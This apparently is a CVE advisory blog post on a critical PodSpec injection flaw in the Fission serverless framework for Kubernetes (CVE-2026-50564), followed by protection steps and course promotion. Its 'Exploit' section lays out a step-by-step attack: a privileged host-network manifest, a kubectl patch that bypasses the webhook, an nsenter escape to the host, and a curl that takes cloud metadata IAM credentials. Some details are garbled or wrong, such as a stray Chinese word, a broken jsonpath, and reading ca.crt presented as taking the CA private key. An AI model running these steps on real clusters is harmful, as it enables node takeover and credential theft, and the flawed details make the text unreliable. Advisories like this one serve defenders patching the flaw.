Fission Environment CRD PodSpec Injection, CVE-2026-50564 (Critical) -DC-Jun2026-752

Listen to this Post

CVE-2026-50564 describes a critical vulnerability in Fission, a Kubernetes-native serverless framework, affecting versions prior to 1.24.0. The flaw resides in the Environment Custom Resource Definition (CRD), which exposes `spec.runtime.podSpec` and `spec.builder.podSpec` fields. These user-supplied PodSpecs are merged directly into the Kubernetes Pod specifications for runtime and builder pods without any validation or sanitization.
The merge logic (pkg/executor/util/merge.go::MergePodSpec) unconditionally propagates dangerous fields from the user-supplied PodSpec into the最终 Pod. These include hostNetwork, hostPID, hostIPC, serviceAccountName, `hostPath` volumes, and per-container `SecurityContext` settings like privileged: true, allowPrivilegeEscalation: true, and dangerous Linux capabilities (SYS_ADMIN, NET_ADMIN, SYS_PTRACE, SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE).

Three independent flaws compound the risk:

  1. Validation Gap: `Environment.Validate()` performed no security-relevant checks on these fields. It only validated container naming conventions, never inspecting PodSpec-level security settings.
  2. UPDATE Bypass: The validating webhook (pkg/webhook/environment.go) was registered with `verbs=create` only. An attacker could apply a clean Environment, then `kubectl patch` in dangerous fields — the webhook was never invoked on updates.
  3. Merge Propagation: `MergePodSpec` forwarded HostPID, HostIPC, HostNetwork, `Volumes` (including hostPath), SecurityContext, and `ServiceAccountName` unconditionally into the Deployments generated by poolmgr, newdeploy, and buildermgr.
    The attack surface is further widened because the Helm chart created the `fission-function` and `fission-builder` namespaces without `pod-security.kubernetes.io/enforce` labels, so Kubernetes Pod Security Admission did not block the escape.
    From a host-network privileged Pod with hostPID, an attacker can `nsenter` into the host, read cloud-metadata credentials, access the container-runtime socket, pivot to other namespaces, and fully compromise the node. In practice, a `kubectl apply` plus a follow-up `kubectl patch` caused poolmgr to schedule a privileged Pod with a host-root mount within roughly 20 seconds. From that Pod, the cluster CA private key was readable, allowing the attacker to sign arbitrary kubelet certificates and achieve full cluster takeover.
    The fix was merged in 3391 and released in v1.24.0. The primary defence is an admission denylist (pkg/apis/core/v1/podspec_safety.go::ValidatePodSpecSafety) called from `Environment.Validate` for both `Runtime.PodSpec` and Builder.PodSpec. The webhook marker is extended to verbs=create;update. A merge-layer belt-and-braces sanitizer strips denylisted fields even if admission is bypassed.

DailyCVE Form:

Platform: ……. Fission
Version: …….. < 1.24.0
Vulnerability :…… PodSpec Injection
Severity: ……. Critical
date: ………. 2026-06-11

Prediction: …… 2026-07-15

Analytics

What Undercode Say:

Check Fission version
kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[bash].image}' | grep -oP 'v\d+.\d+.\d+' || echo "Unknown"
List Environment CRDs (potential targets)
kubectl get environments.fission.io -A
Check webhook configuration (verbs=create only in vulnerable versions)
kubectl get validatingwebhookconfigurations fission-environment-validate -o yaml | grep -A5 "verbs:"

Exploit:

1. Create a clean Environment
apiVersion: fission.io/v1
kind: Environment
metadata:
name: priv-escape
namespace: default
spec:
version: 3
runtime:
image: "ghcr.io/fission/python-env:latest"
podSpec:
hostNetwork: true
hostPID: true
containers:
- name: exploit
securityContext:
privileged: true
poolsize: 1
2. Patch in dangerous fields (bypasses webhook if verbs=create only)
kubectl patch environment priv-escape --type='json' -p='[{"op": "add", "path": "/spec/runtime/podSpec/hostNetwork", "value": true}]'
3. Trigger a function to schedule the privileged Pod
fission function create --name escape-fn --env priv-escape --code <(echo 'print("exploit")')
4. Once Pod is running, exec in and escape to host
kubectl exec -it <pod-name> -n fission-function -- nsenter -t 1 -m -u -i -n bash
5. Read cloud metadata (AWS example)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
6. Access container runtime socket to pivot
ls -la /run/containerd/containerd.sock || ls -la /var/run/docker.sock
7. Read cluster CA private key (if mounted)
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

Protection:

  • Upgrade to Fission v1.24.0 or later.
  • Enforce Pod Security on fission-function and fission-builder namespaces:
    kubectl label ns fission-function pod-security.kubernetes.io/enforce=restricted
    kubectl label ns fission-builder pod-security.kubernetes.io/enforce=restricted
    
  • Restrict RBAC: Limit `environments.fission.io` create/update to trusted administrators only.
  • Network Policies: Restrict egress from function pods to metadata endpoints and the Kubernetes API.
  • Admission Control: Deploy an external admission webhook (e.g., OPA/Gatekeeper) to block dangerous PodSpec fields cluster-wide.
  • Audit: Regularly audit Environment and Function CRDs for suspicious PodSpec configurations.

Impact:

  • Node Compromise: Full host filesystem and network access on the scheduling node.
  • Cluster Takeover: Readable cluster CA private key allows signing arbitrary kubelet certificates.
  • Credential Theft: Cloud metadata credentials (AWS, GCP, Azure) can be exfiltrated.
  • Lateral Movement: Access to container-runtime socket enables pivoting to other namespaces and containers.
  • Data Breach: HostPath volumes and host filesystem access expose sensitive data.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top